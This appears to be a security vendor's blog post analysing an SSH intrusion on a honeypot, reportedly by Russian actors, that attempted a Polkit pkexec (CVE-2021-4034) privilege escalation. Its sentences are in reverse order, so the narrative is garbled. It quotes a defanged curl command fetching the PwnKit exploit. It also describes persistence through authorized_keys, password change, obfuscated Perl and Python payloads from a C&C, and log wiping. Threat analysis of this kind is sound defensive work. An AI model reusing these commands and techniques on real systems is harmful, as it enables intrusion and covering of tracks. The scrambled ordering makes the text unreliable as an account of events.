The next step is the creation of another Perl file by piping a long Base64 string that decodes into a eval unpack Perl command, a classic method of obfuscation. This second script, информация.py, is another Python script that obtains information about the host 4: This Python script just downloaded another Python script from their C&C named информация.py and they executed it. Then, they created and executed a Python script named привет.py 3. ssh/authorized_keysĪfter gaining persistence, they executed some system discovery commands. To gain persistence, and secure the weak SSH access, they added their RSA public key to the user’s SSH authorized_keys file, and then they changed the user’s password. When they saw they couldn’t exploit that vulnerability because the host wasn’t vulnerable to CVE-2021-4034, they tried to delete their evidence by sending an empty character to the log files and deleting the previous scripts. They also tried to exploit that vulnerability with the following Linux ELF binary 2 (e483074bbe5e41cacbe081f290d7e6b0c3184c7f): $ curl -fsSL hxxps:///ly4k/PwnKit/main/PwnKit -o PwnKit Then, they downloaded a GitHub repository called CVE-2021-4034 to exploit the Polkit pkexec vulnerability, and try to elevate their privileges 1. The attackers accessed the server via SSH from the TOR network and they started looking to see what the server contained by executing the following commands: $ id This vulnerability was discovered by The Qualys Research Team. The CVE-2021-4034 vulnerability is a memory corruption vulnerability that allows unprivileged users to run commands as privileged users according to predefined policies. It provides an organized way for non-privileged processes to communicate with privileged ones. Polkit is a component for controlling systemwide privileges in Unix operating systems. To see our team talk about the intel uncovered, watch this on-demand webinar. The technique is worth noting, and this action on our deception environment could also represent a larger-scale effort on the part of the attackers. After failing to escalate privileges, the attacker left a loop of code running that, every second, executed a curl command against a Ukrainian government web page. This attempt at privilege escalation could have had serious results if it had been successful. In this post, we’re going to analyze an attack we discovered last week that appears to be Russian actors attempting to use a deception host to attack Ukrainian infrastructure. Tensions that began in 2014 following the Russian annexation of Crimea from Ukraine are fueling the border crisis today. Russia and Ukraine are staring at each other across the abyss.
0 Comments
Leave a Reply. |